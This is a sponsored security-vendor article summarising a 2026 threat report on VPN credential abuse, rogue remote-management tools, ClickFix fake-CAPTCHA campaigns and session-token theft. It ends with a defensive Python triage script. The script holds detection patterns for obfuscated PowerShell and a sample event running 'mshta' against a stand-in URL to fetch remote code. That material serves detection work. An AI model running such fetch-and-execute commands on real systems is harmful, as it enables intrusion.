Remote access and trusted administrative tools play a central role in how organizations operate today. According to Blackpoint Cyber's 2026 Annual Threat Report, they are also increasingly central to how intrusions begin.
Informed by analysis of thousands of security investigations conducted during the reporting period, the report highlights a shift in attacker behavior. Rather than relying primarily on vulnerability exploitation, threat actors frequently gained access by using valid credentials, legitimate tools, and routine user-driven actions.
The report examines these patterns, documents where intrusion activity was disrupted, and presents defensive priorities derived from analyzed incident response outcomes observed throughout 2025.
Additional data and incident walkthroughs will be covered during an upcoming live webinar hosted by Blackpoint Cyber.
Key Findings From the 2026 Annual Threat Report
Attackers Are Entering Through Legitimate Access Paths
Across incidents analyzed in the report, attackers were more likely to log in using legitimate access than to exploit vulnerabilities as their primary entry point.
SSL VPN abuse accounted for 32.8 percent of all identifiable incidents, making it one of the most common initial access vectors. In many cases, threat actors authenticated using valid but compromised credentials, resulting in VPN sessions that appeared legitimate to security controls.
Once access was established, these sessions often provided broad internal reach, allowing attackers to move quickly toward high-value systems without immediately triggering alerts.
Trusted IT Tools Are Being Used Against Organizations
The report also documents frequent abuse of legitimate Remote Monitoring and Management (RMM) tools as a means of access and persistence.
RMM abuse appeared in 30.3 percent of identifiable incidents, with ScreenConnect present in more than 70 percent of rogue RMM cases. Because these tools are commonly used for standard IT administration, unauthorized installations often resembled expected activity and were difficult to distinguish without strong visibility.
The report notes that environments with multiple remote access tools in use were more likely to see rogue instances blend in with existing tooling.
Social Engineering, Not Exploits, Drove the Majority of Incidents
While legitimate access paths enabled many intrusions, user interaction represented the largest driver of overall incident volume.
Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents, making them the most common attack pattern documented in the report.
Rather than exploiting software vulnerabilities, these campaigns relied on deceptive prompts. Users were instructed to paste commands into the Windows Run dialog as part of what appeared to be a routine verification step. Execution used built-in Windows tools, without traditional malware downloads or exploit activity.
Cloud Intrusions Focused on Session Reuse After MFA
Multi-factor authentication was enabled in many cloud environments associated with investigated incidents, yet account compromise still occurred.
Adversary-in-the-Middle phishing accounted for roughly 16 percent of cloud account disables documented in the report. In these scenarios, MFA functioned as designed. Instead of bypassing authentication, attackers captured authenticated session tokens issued after successful MFA and reused them to access cloud services.
From the perspective of the cloud platform, this activity aligned with a legitimate authenticated session.
Many of the attacks described above begin with legitimate access. What happens next is where real damage occurs.
In a recent investigation, our SOC identified a new implant called Roadk1ll, designed to pivot across systems using WebSocket-based communication and maintain access while blending into network traffic.
Join Inside the SOC Episode #002 to see how these attacks progress from initial access to full environment compromise.
What These Findings Mean for Security Teams
Across industries, environments, and attack types, the report highlights a consistent pattern: many successful intrusions relied on activity that blended into normal operations.
Rather than relying on novel exploits or advanced malware, attackers abused everyday workflows such as remote logins, trusted tools, and standard user actions. Based on the attack chains analyzed, the report identifies several defensive priorities:
- Treat remote access as high-risk, high-impact activity
- Maintain a complete inventory of approved RMM tools and remove unused or legacy agents
- Restrict unapproved software installations and limit execution from user-writable directories
- Apply Conditional Access controls that evaluate device posture, location, and session risk
These patterns were documented across frequently targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.
For teams interested in examining how these intrusion patterns unfold, Blackpoint Cyber will review key findings, case examples, and defensive takeaways from the 2026 Annual Threat Report during an upcoming live webinar.
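The following is an added example, not code from the report or from Blackpoint Cyber, showing how the RMM inventory and user-writable-path priorities above, together with the Run dialog pattern from the ClickFix section, can be turned into triage logic over process-creation telemetry. The approved-tool inventory, the RMM binary names, the command-line hints and the Sysmon-style sample events are all constructed assumptions.

```python
import re

# Constructed approved-RMM inventory and tool lists (hypothetical, not from the report).
APPROVED_RMM = {"screenconnect.clientservice.exe"}
RMM_BINARIES = APPROVED_RMM | {"anydesk.exe", "atera.exe", "ateraagent.exe"}
# Built-in Windows tools a ClickFix prompt would have the Run dialog launch.
RUN_TOOLS = {"powershell.exe", "mshta.exe", "cmd.exe", "wscript.exe", "curl.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\temp\\", re.I)
CLICKFIX_HINT = re.compile(r"https?://|-enc|hidden|\biex\b", re.I)

def triage(event):
    """Return findings for one process-creation event (empty list = nothing flagged)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    findings = []
    if image in RMM_BINARIES and image not in APPROVED_RMM:
        findings.append(f"rogue RMM: {image} is not in the approved inventory")
    if USER_WRITABLE.search(event["Image"]):
        # An approved tool running from AppData/Temp is the "blends in" case from the report.
        kind = "approved RMM running from" if image in APPROVED_RMM else "execution from"
        findings.append(f"{kind} user-writable path: {event['Image']}")
    # Run dialog launches have explorer.exe as parent; require a remote/obfuscation hint.
    if parent == "explorer.exe" and image in RUN_TOOLS and CLICKFIX_HINT.search(event["CommandLine"]):
        findings.append(f"ClickFix-style Run dialog launch: {event['CommandLine']}")
    return findings

def run_triage(events):
    """Map event index -> findings for every event that produced at least one."""
    return {i: f for i, e in enumerate(events) if (f := triage(e))}

# Constructed sample events in Sysmon Event ID 1 style (not real telemetry).
EVENTS = [
    {"Image": r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.ClientService.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "ScreenConnect.ClientService.exe"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\ScreenConnect.ClientService.exe",
     "ParentImage": r"C:\Users\jdoe\AppData\Local\Temp\setup.exe", "CommandLine": "ScreenConnect.ClientService.exe"},
    {"Image": r"C:\Program Files\AnyDesk\anydesk.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "anydesk.exe --service"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://verify.example.invalid/captcha"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, found in run_triage(EVENTS).items():
        print(idx, found)
```

Only the approved ScreenConnect service under Program Files and the Notepad launch pass clean; the same ScreenConnect binary under a user's Temp directory is flagged, which is the case a plain name-based allow list would miss.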
Sponsored and written by Blackpoint Cyber.